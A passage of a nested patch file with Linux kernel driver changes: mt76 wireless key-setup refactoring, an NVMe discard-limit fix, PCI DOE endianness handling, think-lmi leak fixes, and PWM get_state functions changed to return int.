+-	mt7615_mac_wtbl_update_cipher(dev, wcid, cipher, cipher_mask, cmd);
+-	err = mt7615_mac_wtbl_update_key(dev, wcid, key, cipher, cipher_mask,
+-					 cmd);
++	cipher_mask |= BIT(cipher);
++	mt7615_mac_wtbl_update_cipher(dev, wcid, cipher, cipher_mask);
++	err = mt7615_mac_wtbl_update_key(dev, wcid, key, cipher, cipher_mask);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	err = mt7615_mac_wtbl_update_pk(dev, wcid, cipher, cipher_mask,
+-					key->keyidx, cmd);
++					key->keyidx);
+ 	if (err < 0)
+ 		return err;
+ 
+@@ -1316,13 +1289,12 @@ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 
+ int mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			    struct mt76_wcid *wcid,
+-			    struct ieee80211_key_conf *key,
+-			    enum set_key_cmd cmd)
++			    struct ieee80211_key_conf *key)
+ {
+ 	int err;
+ 
+ 	spin_lock_bh(&dev->mt76.lock);
+-	err = __mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++	err = __mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 	spin_unlock_bh(&dev->mt76.lock);
+ 
+ 	return err;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/main.c b/drivers/net/wireless/mediatek/mt76/mt7615/main.c
+index 8d4733f87cda9..a3b0d4e9146a6 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/main.c
+@@ -391,18 +391,17 @@ static int mt7615_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 
+ 	if (cmd == SET_KEY)
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	if (mt76_is_mmio(&dev->mt76))
+-		err = mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++		err = mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 	else
+-		err = __mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++		err = __mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 
+ out:
+ 	mt7615_mutex_release(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h b/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
+index 060d52c81d9e9..c0e62082b62df 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
+@@ -482,11 +482,9 @@ int mt7615_mac_write_txwi(struct mt7615_dev *dev, __le32 *txwi,
+ void mt7615_mac_set_timing(struct mt7615_phy *phy);
+ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			      struct mt76_wcid *wcid,
+-			      struct ieee80211_key_conf *key,
+-			      enum set_key_cmd cmd);
++			      struct ieee80211_key_conf *key);
+ int mt7615_mac_wtbl_set_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+-			    struct ieee80211_key_conf *key,
+-			    enum set_key_cmd cmd);
++			    struct ieee80211_key_conf *key);
+ void mt7615_mac_reset_work(struct work_struct *work);
+ u32 mt7615_mac_get_sta_tid_sn(struct mt7615_dev *dev, int wcid, u8 tid);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_util.c b/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
+index 604ddcc211231..324535a0dd6d4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
+@@ -455,20 +455,20 @@ int mt76x02_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 	msta = sta ? (struct mt76x02_sta *)sta->drv_priv : NULL;
+ 	wcid = msta ? &msta->wcid : &mvif->group_wcid;
+ 
+-	if (cmd == SET_KEY) {
+-		key->hw_key_idx = wcid->idx;
+-		wcid->hw_key_idx = idx;
+-		if (key->flags & IEEE80211_KEY_FLAG_RX_MGMT) {
+-			key->flags |= IEEE80211_KEY_FLAG_SW_MGMT_TX;
+-			wcid->sw_iv = true;
+-		}
+-	} else {
++	if (cmd != SET_KEY) {
+ 		if (idx == wcid->hw_key_idx) {
+ 			wcid->hw_key_idx = -1;
+ 			wcid->sw_iv = false;
+ 		}
+ 
+-		key = NULL;
++		return 0;
++	}
++
++	key->hw_key_idx = wcid->idx;
++	wcid->hw_key_idx = idx;
++	if (key->flags & IEEE80211_KEY_FLAG_RX_MGMT) {
++		key->flags |= IEEE80211_KEY_FLAG_SW_MGMT_TX;
++		wcid->sw_iv = true;
+ 	}
+ 	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index 060cb88e82e30..bda26bd62412e 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -393,16 +393,15 @@ static int mt7915_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 		mt7915_mcu_add_bss_info(phy, vif, true);
+ 	}
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt76_connac_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				      key, MCU_EXT_CMD(STA_REC_UPDATE),
+ 				      &msta->wcid, cmd);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 111d9221b94f5..60fbbd1ac2f78 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -464,16 +464,15 @@ static int mt7921_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 
+ 	mt7921_mutex_acquire(dev);
+ 
+-	if (cmd == SET_KEY)
++	if (cmd == SET_KEY) {
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	} else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	err = mt76_connac_mcu_add_key(&dev->mt76, vif, &msta->bip,
+ 				      key, MCU_UNI_CMD(STA_REC_UPDATE),
+ 				      &msta->wcid, cmd);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index a95e48b51da66..cb71ce3413c2d 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1711,6 +1711,9 @@ static void nvme_config_discard(struct gendisk *disk, struct nvme_ns *ns)
+ 	struct request_queue *queue = disk->queue;
+ 	u32 size = queue_logical_block_size(queue);
+ 
++	if (ctrl->dmrsl && ctrl->dmrsl <= nvme_sect_to_lba(ns, UINT_MAX))
++		ctrl->max_discard_sectors = nvme_lba_to_sect(ns, ctrl->dmrsl);
++
+ 	if (ctrl->max_discard_sectors == 0) {
+ 		blk_queue_max_discard_sectors(queue, 0);
+ 		return;
+@@ -1725,9 +1728,6 @@ static void nvme_config_discard(struct gendisk *disk, struct nvme_ns *ns)
+ 	if (queue->limits.max_discard_sectors)
+ 		return;
+ 
+-	if (ctrl->dmrsl && ctrl->dmrsl <= nvme_sect_to_lba(ns, UINT_MAX))
+-		ctrl->max_discard_sectors = nvme_lba_to_sect(ns, ctrl->dmrsl);
+-
+ 	blk_queue_max_discard_sectors(queue, ctrl->max_discard_sectors);
+ 	blk_queue_max_discard_segments(queue, ctrl->max_discard_segments);
+ 
+diff --git a/drivers/pci/doe.c b/drivers/pci/doe.c
+index 66d9ab2886468..e5e9b287b9766 100644
+--- a/drivers/pci/doe.c
++++ b/drivers/pci/doe.c
+@@ -128,7 +128,7 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 		return -EIO;
+ 
+ 	/* Length is 2 DW of header + length of payload in DW */
+-	length = 2 + task->request_pl_sz / sizeof(u32);
++	length = 2 + task->request_pl_sz / sizeof(__le32);
+ 	if (length > PCI_DOE_MAX_LENGTH)
+ 		return -EIO;
+ 	if (length == PCI_DOE_MAX_LENGTH)
+@@ -141,9 +141,9 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+ 			       FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_2_LENGTH,
+ 					  length));
+-	for (i = 0; i < task->request_pl_sz / sizeof(u32); i++)
++	for (i = 0; i < task->request_pl_sz / sizeof(__le32); i++)
+ 		pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+-				       task->request_pl[i]);
++				       le32_to_cpu(task->request_pl[i]));
+ 
+ 	pci_doe_write_ctrl(doe_mb, PCI_DOE_CTRL_GO);
+ 
+@@ -195,11 +195,11 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 
+ 	/* First 2 dwords have already been read */
+ 	length -= 2;
+-	payload_length = min(length, task->response_pl_sz / sizeof(u32));
++	payload_length = min(length, task->response_pl_sz / sizeof(__le32));
+ 	/* Read the rest of the response payload */
+ 	for (i = 0; i < payload_length; i++) {
+-		pci_read_config_dword(pdev, offset + PCI_DOE_READ,
+-				      &task->response_pl[i]);
++		pci_read_config_dword(pdev, offset + PCI_DOE_READ, &val);
++		task->response_pl[i] = cpu_to_le32(val);
+ 		/* Prior to the last ack, ensure Data Object Ready */
+ 		if (i == (payload_length - 1) && !pci_doe_data_obj_ready(doe_mb))
+ 			return -EIO;
+@@ -217,13 +217,14 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 	if (FIELD_GET(PCI_DOE_STATUS_ERROR, val))
+ 		return -EIO;
+ 
+-	return min(length, task->response_pl_sz / sizeof(u32)) * sizeof(u32);
++	return min(length, task->response_pl_sz / sizeof(__le32)) * sizeof(__le32);
+ }
+ 
+ static void signal_task_complete(struct pci_doe_task *task, int rv)
+ {
+ 	task->rv = rv;
+ 	task->complete(task);
++	destroy_work_on_stack(&task->work);
+ }
+ 
+ static void signal_task_abort(struct pci_doe_task *task, int rv)
+@@ -317,14 +318,16 @@ static int pci_doe_discovery(struct pci_doe_mb *doe_mb, u8 *index, u16 *vid,
+ {
+ 	u32 request_pl = FIELD_PREP(PCI_DOE_DATA_OBJECT_DISC_REQ_3_INDEX,
+ 				    *index);
++	__le32 request_pl_le = cpu_to_le32(request_pl);
++	__le32 response_pl_le;
+ 	u32 response_pl;
+ 	DECLARE_COMPLETION_ONSTACK(c);
+ 	struct pci_doe_task task = {
+ 		.prot.vid = PCI_VENDOR_ID_PCI_SIG,
+ 		.prot.type = PCI_DOE_PROTOCOL_DISCOVERY,
+-		.request_pl = &request_pl,
++		.request_pl = &request_pl_le,
+ 		.request_pl_sz = sizeof(request_pl),
+-		.response_pl = &response_pl,
++		.response_pl = &response_pl_le,
+ 		.response_pl_sz = sizeof(response_pl),
+ 		.complete = pci_doe_task_complete,
+ 		.private = &c,
+@@ -340,6 +343,7 @@ static int pci_doe_discovery(struct pci_doe_mb *doe_mb, u8 *index, u16 *vid,
+ 	if (task.rv != sizeof(response_pl))
+ 		return -EIO;
+ 
++	response_pl = le32_to_cpu(response_pl_le);
+ 	*vid = FIELD_GET(PCI_DOE_DATA_OBJECT_DISC_RSP_3_VID, response_pl);
+ 	*protocol = FIELD_GET(PCI_DOE_DATA_OBJECT_DISC_RSP_3_PROTOCOL,
+ 			      response_pl);
+@@ -520,6 +524,8 @@ EXPORT_SYMBOL_GPL(pci_doe_supports_prot);
+  * task->complete will be called when the state machine is done processing this
+  * task.
+  *
++ * @task must be allocated on the stack.
++ *
+  * Excess data will be discarded.
+  *
+  * RETURNS: 0 when task has been successfully queued, -ERRNO on error
+@@ -533,15 +539,15 @@ int pci_doe_submit_task(struct pci_doe_mb *doe_mb, struct pci_doe_task *task)
+ 	 * DOE requests must be a whole number of DW and the response needs to
+ 	 * be big enough for at least 1 DW
+ 	 */
+-	if (task->request_pl_sz % sizeof(u32) ||
+-	    task->response_pl_sz < sizeof(u32))
++	if (task->request_pl_sz % sizeof(__le32) ||
++	    task->response_pl_sz < sizeof(__le32))
+ 		return -EINVAL;
+ 
+ 	if (test_bit(PCI_DOE_FLAG_DEAD, &doe_mb->flags))
+ 		return -EIO;
+ 
+ 	task->doe_mb = doe_mb;
+-	INIT_WORK(&task->work, doe_statemachine_work);
++	INIT_WORK_ONSTACK(&task->work, doe_statemachine_work);
+ 	queue_work(doe_mb->work_queue, &task->work);
+ 	return 0;
+ }
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index 74af3e593b2ca..336b9029d1515 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -920,7 +920,7 @@ static ssize_t display_name_show(struct kobject *kobj, struct kobj_attribute *at
+ static ssize_t current_value_show(struct kobject *kobj, struct kobj_attribute *attr, char *buf)
+ {
+ 	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
+-	char *item, *value;
++	char *item, *value, *p;
+ 	int ret;
+ 
+ 	ret = tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID);
+@@ -930,10 +930,15 @@ static ssize_t current_value_show(struct kobject *kobj, struct kobj_attribute *a
+ 	/* validate and split from `item,value` -> `value` */
+ 	value = strpbrk(item, ",");
+ 	if (!value || value == item || !strlen(value + 1))
+-		return -EINVAL;
+-
+-	ret = sysfs_emit(buf, "%s\n", value + 1);
++		ret = -EINVAL;
++	else {
++		/* On Workstations remove the Options part after the value */
++		p = strchrnul(value, ';');
++		*p = '\0';
++		ret = sysfs_emit(buf, "%s\n", value + 1);
++	}
+ 	kfree(item);
++
+ 	return ret;
+ }
+ 
+@@ -1457,10 +1462,10 @@ static int tlmi_analyze(void)
+ 			 * name string.
+ 			 * Try and pull that out if it's available.
+ 			 */
+-			char *item, *optstart, *optend;
++			char *optitem, *optstart, *optend;
+ 
+-			if (!tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID)) {
+-				optstart = strstr(item, "[Optional:");
++			if (!tlmi_setting(setting->index, &optitem, LENOVO_BIOS_SETTING_GUID)) {
++				optstart = strstr(optitem, "[Optional:");
+ 				if (optstart) {
+ 					optstart += strlen("[Optional:");
+ 					optend = strstr(optstart, "]");
+@@ -1469,6 +1474,7 @@ static int tlmi_analyze(void)
+ 							kstrndup(optstart, optend - optstart,
+ 									GFP_KERNEL);
+ 				}
++				kfree(optitem);
+ 			}
+ 		}
+ 		/*
+diff --git a/drivers/pwm/pwm-atmel.c b/drivers/pwm/pwm-atmel.c
+index 8e00a4286145b..cdbc23649032c 100644
+--- a/drivers/pwm/pwm-atmel.c
++++ b/drivers/pwm/pwm-atmel.c
+@@ -356,8 +356,8 @@ static int atmel_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void atmel_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int atmel_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct atmel_pwm_chip *atmel_pwm = to_atmel_pwm_chip(chip);
+ 	u32 sr, cmr;
+@@ -396,6 +396,8 @@ static void atmel_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		state->polarity = PWM_POLARITY_INVERSED;
+ 	else
+ 		state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops atmel_pwm_ops = {
+diff --git a/drivers/pwm/pwm-bcm-iproc.c b/drivers/pwm/pwm-bcm-iproc.c
+index 7251037d4dd56..97ec131eb7c1b 100644
+--- a/drivers/pwm/pwm-bcm-iproc.c
++++ b/drivers/pwm/pwm-bcm-iproc.c
+@@ -68,8 +68,8 @@ static void iproc_pwmc_disable(struct iproc_pwmc *ip, unsigned int channel)
+ 	ndelay(400);
+ }
+ 
+-static void iproc_pwmc_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				 struct pwm_state *state)
++static int iproc_pwmc_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				struct pwm_state *state)
+ {
+ 	struct iproc_pwmc *ip = to_iproc_pwmc(chip);
+ 	u64 tmp, multi, rate;
+@@ -91,7 +91,7 @@ static void iproc_pwmc_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (rate == 0) {
+ 		state->period = 0;
+ 		state->duty_cycle = 0;
+-		return;
++		return 0;
+ 	}
+ 
+ 	value = readl(ip->base + IPROC_PWM_PRESCALE_OFFSET);
+@@ -107,6 +107,8 @@ static void iproc_pwmc_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	value = readl(ip->base + IPROC_PWM_DUTY_CYCLE_OFFSET(pwm->hwpwm));
+ 	tmp = (value & IPROC_PWM_PERIOD_MAX) * multi;
+ 	state->duty_cycle = div64_u64(tmp, rate);
++
++	return 0;
+ }
+ 
+ static int iproc_pwmc_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-crc.c b/drivers/pwm/pwm-crc.c
+index 7b357d1cf6421..4099850117ba4 100644
+--- a/drivers/pwm/pwm-crc.c
++++ b/drivers/pwm/pwm-crc.c
+@@ -121,8 +121,8 @@ static int crc_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void crc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			      struct pwm_state *state)
++static int crc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			     struct pwm_state *state)
+ {
+ 	struct crystalcove_pwm *crc_pwm = to_crc_pwm(chip);
+ 	struct device *dev = crc_pwm->chip.dev;
+@@ -132,13 +132,13 @@ static void crc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	error = regmap_read(crc_pwm->regmap, PWM0_CLK_DIV, &clk_div_reg);
+ 	if (error) {
+ 		dev_err(dev, "Error reading PWM0_CLK_DIV %d\n", error);
+-		return;
++		return 0;
+ 	}
+ 
+ 	error = regmap_read(crc_pwm->regmap, PWM0_DUTY_CYCLE, &duty_cycle_reg);
+ 	if (error) {
+ 		dev_err(dev, "Error reading PWM0_DUTY_CYCLE %d\n", error);
+-		return;
++		return 0;
+ 	}
+ 
+ 	clk_div = (clk_div_reg & ~PWM_OUTPUT_ENABLE) + 1;
+@@ -149,6 +149,8 @@ static void crc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		DIV_ROUND_UP_ULL(duty_cycle_reg * state->period, PWM_MAX_LEVEL);
+ 	state->polarity = PWM_POLARITY_NORMAL;
+ 	state->enabled = !!(clk_div_reg & PWM_OUTPUT_ENABLE);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops crc_pwm_ops = {
+diff --git a/drivers/pwm/pwm-cros-ec.c b/drivers/pwm/pwm-cros-ec.c
+index 7f10f56c3eb66..e55bc36ed4972 100644
+--- a/drivers/pwm/pwm-cros-ec.c
++++ b/drivers/pwm/pwm-cros-ec.c
+@@ -183,8 +183,8 @@ static int cros_ec_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct cros_ec_pwm_device *ec_pwm = pwm_to_cros_ec_pwm(chip);
+ 	struct cros_ec_pwm *channel = pwm_get_chip_data(pwm);
+@@ -193,11 +193,12 @@ static void cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	ret = cros_ec_pwm_get_duty(ec_pwm, pwm->hwpwm);
+ 	if (ret < 0) {
+ 		dev_err(chip->dev, "error getting initial duty: %d\n", ret);
+-		return;
++		return 0;
+ 	}
+ 
+ 	state->enabled = (ret > 0);
+ 	state->period = EC_PWM_MAX_DUTY;
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	/*
+ 	 * Note that "disabled" and "duty cycle == 0" are treated the same. If
+@@ -212,6 +213,8 @@ static void cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		state->duty_cycle = channel->duty_cycle;
+ 	else
+ 		state->duty_cycle = ret;
++
++	return 0;
+ }
+ 
+ static struct pwm_device *
+diff --git a/drivers/pwm/pwm-dwc.c b/drivers/pwm/pwm-dwc.c
+index 7568300bb11e5..bd2308812096d 100644
+--- a/drivers/pwm/pwm-dwc.c
++++ b/drivers/pwm/pwm-dwc.c
+@@ -163,8 +163,8 @@ static int dwc_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void dwc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			      struct pwm_state *state)
++static int dwc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			     struct pwm_state *state)
+ {
+ 	struct dwc_pwm *dwc = to_dwc_pwm(chip);
+ 	u64 duty, period;
+@@ -188,6 +188,8 @@ static void dwc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	state->polarity = PWM_POLARITY_INVERSED;
+ 
+ 	pm_runtime_put_sync(chip->dev);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops dwc_pwm_ops = {
+diff --git a/drivers/pwm/pwm-hibvt.c b/drivers/pwm/pwm-hibvt.c
+index 333f1b18ff4e6..1b9274c5ad872 100644
+--- a/drivers/pwm/pwm-hibvt.c
++++ b/drivers/pwm/pwm-hibvt.c
+@@ -128,8 +128,8 @@ static void hibvt_pwm_set_polarity(struct pwm_chip *chip,
+ 				PWM_POLARITY_MASK, (0x0 << PWM_POLARITY_SHIFT));
+ }
+ 
+-static void hibvt_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int hibvt_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct hibvt_pwm_chip *hi_pwm_chip = to_hibvt_pwm_chip(chip);
+ 	void __iomem *base;
+@@ -146,6 +146,9 @@ static void hibvt_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	value = readl(base + PWM_CTRL_ADDR(pwm->hwpwm));
+ 	state->enabled = (PWM_ENABLE_MASK & value);
++	state->polarity = (PWM_POLARITY_MASK & value) ? PWM_POLARITY_INVERSED : PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static int hibvt_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-imx-tpm.c b/drivers/pwm/pwm-imx-tpm.c
+index e5e7b7c339a8f..ed1aad96fff04 100644
+--- a/drivers/pwm/pwm-imx-tpm.c
++++ b/drivers/pwm/pwm-imx-tpm.c
+@@ -132,9 +132,9 @@ static int pwm_imx_tpm_round_state(struct pwm_chip *chip,
+ 	return 0;
+ }
+ 
+-static void pwm_imx_tpm_get_state(struct pwm_chip *chip,
+-				  struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int pwm_imx_tpm_get_state(struct pwm_chip *chip,
++				 struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct imx_tpm_pwm_chip *tpm = to_imx_tpm_pwm_chip(chip);
+ 	u32 rate, val, prescale;
+@@ -164,6 +164,8 @@ static void pwm_imx_tpm_get_state(struct pwm_chip *chip,
+ 
+ 	/* get channel status */
+ 	state->enabled = FIELD_GET(PWM_IMX_TPM_CnSC_ELS, val) ? true : false;
++
++	return 0;
+ }
+ 
+ /* this function is supposed to be called with mutex hold */
+diff --git a/drivers/pwm/pwm-imx27.c b/drivers/pwm/pwm-imx27.c
+index ea91a2f81a9fc..3a22c2fddc452 100644
+--- a/drivers/pwm/pwm-imx27.c
++++ b/drivers/pwm/pwm-imx27.c
+@@ -118,8 +118,8 @@ static void pwm_imx27_clk_disable_unprepare(struct pwm_imx27_chip *imx)
+ 	clk_disable_unprepare(imx->clk_ipg);
+ }
+ 
+-static void pwm_imx27_get_state(struct pwm_chip *chip,
+-				struct pwm_device *pwm, struct pwm_state *state)
++static int pwm_imx27_get_state(struct pwm_chip *chip,
++			       struct pwm_device *pwm, struct pwm_state *state)
+ {
+ 	struct pwm_imx27_chip *imx = to_pwm_imx27_chip(chip);
+ 	u32 period, prescaler, pwm_clk, val;
+@@ -128,7 +128,7 @@ static void pwm_imx27_get_state(struct pwm_chip *chip,
+ 
+ 	ret = pwm_imx27_clk_prepare_enable(imx);
+ 	if (ret < 0)
+-		return;
++		return 0;
+ 
+ 	val = readl(imx->mmio_base + MX3_PWMCR);
+ 
+@@ -170,6 +170,8 @@ static void pwm_imx27_get_state(struct pwm_chip *chip,
+ 	state->duty_cycle = DIV_ROUND_UP_ULL(tmp, pwm_clk);
+ 
+ 	pwm_imx27_clk_disable_unprepare(imx);
++
++	return 0;
+ }
+ 
+ static void pwm_imx27_sw_reset(struct pwm_chip *chip)
+diff --git a/drivers/pwm/pwm-intel-lgm.c b/drivers/pwm/pwm-intel-lgm.c
+index b66c350740870..0cd7dd548e82f 100644
+--- a/drivers/pwm/pwm-intel-lgm.c
++++ b/drivers/pwm/pwm-intel-lgm.c
+@@ -86,8 +86,8 @@ static int lgm_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return lgm_pwm_enable(chip, 1);
+ }
+ 
+-static void lgm_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			      struct pwm_state *state)
++static int lgm_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			     struct pwm_state *state)
+ {
+ 	struct lgm_pwm_chip *pc = to_lgm_pwm_chip(chip);
+ 	u32 duty, val;
+@@ -100,6 +100,8 @@ static void lgm_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	regmap_read(pc->regmap, LGM_PWM_FAN_CON0, &val);
+ 	duty = FIELD_GET(LGM_PWM_FAN_DC_MSK, val);
+ 	state->duty_cycle = DIV_ROUND_UP(duty * pc->period, LGM_PWM_MAX_DUTY_CYCLE);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops lgm_pwm_ops = {
+diff --git a/drivers/pwm/pwm-iqs620a.c b/drivers/pwm/pwm-iqs620a.c
+index 54bd95a5cab0c..aeb19a274accf 100644
+--- a/drivers/pwm/pwm-iqs620a.c
++++ b/drivers/pwm/pwm-iqs620a.c
+@@ -104,8 +104,8 @@ static int iqs620_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return ret;
+ }
+ 
+-static void iqs620_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				 struct pwm_state *state)
++static int iqs620_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				struct pwm_state *state)
+ {
+ 	struct iqs620_pwm_private *iqs620_pwm;
+ 
+@@ -126,6 +126,9 @@ static void iqs620_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	mutex_unlock(&iqs620_pwm->lock);
+ 
+ 	state->period = IQS620_PWM_PERIOD_NS;
++	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static int iqs620_pwm_notifier(struct notifier_block *notifier,
+diff --git a/drivers/pwm/pwm-keembay.c b/drivers/pwm/pwm-keembay.c
+index 733811b057219..ac02d8bb4a0b5 100644
+--- a/drivers/pwm/pwm-keembay.c
++++ b/drivers/pwm/pwm-keembay.c
+@@ -89,8 +89,8 @@ static void keembay_pwm_disable(struct keembay_pwm *priv, int ch)
+ 				KMB_PWM_LEADIN_OFFSET(ch));
+ }
+ 
+-static void keembay_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int keembay_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct keembay_pwm *priv = to_keembay_pwm_dev(chip);
+ 	unsigned long long high, low;
+@@ -113,6 +113,8 @@ static void keembay_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	state->duty_cycle = DIV_ROUND_UP_ULL(high, clk_rate);
+ 	state->period = DIV_ROUND_UP_ULL(high + low, clk_rate);
+ 	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static int keembay_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-lpss.c b/drivers/pwm/pwm-lpss.c
+index accdef5dd58e7..81ac297b8ba50 100644
+--- a/drivers/pwm/pwm-lpss.c
